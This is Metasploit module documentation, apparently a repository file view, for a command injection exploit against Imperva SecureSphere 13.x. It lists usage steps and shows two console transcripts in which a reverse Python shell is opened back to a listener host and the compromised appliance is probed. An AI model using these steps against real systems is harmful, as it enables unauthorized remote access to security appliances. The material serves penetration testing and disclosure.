adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
bab651e94d05ae53efcaa8448670e4fdf3a82e33
metasploit-gs/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
T
rsp3ar bab651e94d Add Imperva SecureSphere module
2019-01-07 22:18:04 -08:00

4.5 KiB
Raw Blame History

Description

This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.

Vulnerable Application

Imperva SecureSphere 13.0/13.1/13.2

Verification Steps

  1. use exploit/linux/http/imperva_securesphere_exec
  2. set RHOST [TARGET IP]
  3. set PASS [Agent registration password] if the target has been set to gateway mode
  4. Run check
  5. Verify that the result is The target is vulnerable.
  6. set payload cmd/unix/reverse_python
  7. set LHOST [IP]
  8. Run exploit
  9. Verify that the reverse shell is obtained

Scenarios

Imperva Secure 13.0 Pre-FTL mode:

msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201
RHOSTS => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload cmd/unix/reverse_python

uname -a
Linux localhost 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:855 errors:0 dropped:0 overruns:0 frame:0
          TX packets:566 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:94180 (91.9 KiB)  TX bytes:198152 (193.5 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):

msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201
RHOSTS => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
PASS => lshy5782%lsLS
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload cmd/unix/reverse_python

uname -a
Linux GW 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:309 errors:0 dropped:0 overruns:0 frame:0
          TX packets:339 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:52168 (50.9 KiB)  TX bytes:56159 (54.8 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:787 errors:0 dropped:0 overruns:0 frame:0
          TX packets:787 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:111598 (108.9 KiB)  TX bytes:111598 (108.9 KiB)
Reference in New Issue View Git Blame Copy Permalink